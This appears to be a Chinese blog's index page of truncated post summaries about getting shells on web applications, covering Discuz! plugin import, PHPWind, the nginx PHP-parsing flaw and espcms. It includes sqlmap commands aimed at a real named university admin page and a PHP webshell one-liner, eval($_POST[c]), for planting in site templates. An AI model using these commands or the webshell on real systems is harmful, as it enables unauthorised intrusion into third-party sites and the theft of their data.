摘要: 方法为: 后台: 插件--添加插件--请选择导入方式:上传本帖附件中的XML文件 并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误!!) 然后确认shell地址就为:data/plugindata/shell.lang.php (discuz x1.5 )shell地址就为:dat 阅读全文
posted @ 2016-07-07 16:28 小生观察室 阅读(881) 评论(0) 推荐(0) 编辑
摘要: /apps/group/admin/manage.php line 219 S::gp(array('ttable', 'ptable', 'page','cid','author','ckauthor','keyword','ktype','ttype','ckkeyword','postdate 阅读全文
posted @ 2016-07-07 13:23 小生观察室 阅读(426) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2016-05-17 19:39 小生观察室 阅读(1) 评论(0) 推荐(0) 编辑
摘要: 漏洞介绍:nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作反向代理,也可以非常好的支持PHP的运行。80sec发现其中存在一个较为严重的安全问题,默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的ng 阅读全文
posted @ 2016-04-26 13:43 小生观察室 阅读(1915) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2016-04-22 11:11 小生观察室 阅读(41) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2016-04-20 17:03 小生观察室 阅读(5) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2016-04-18 12:25 小生观察室 阅读(7) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2016-04-12 17:04 小生观察室 阅读(14) 评论(0) 推荐(0) 编辑
摘要: 过程: D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staff/admin.php?staffid=1" --current-user 必须是root权限 D:\sqlmap>sqlmap.py -u "www.eltu.cuhk.edu.hk/staf 阅读全文
posted @ 2016-04-10 03:04 小生观察室 阅读(1042) 评论(0) 推荐(0) 编辑
摘要: 今天在espcms v5后台getshell时发现,可以在模板中插入如下代码,成功执行PHP。 <script language="php">eval($_POST[c])</script> 阅读全文
posted @ 2016-04-09 15:05 小生观察室 阅读(1020) 评论(0) 推荐(0) 编辑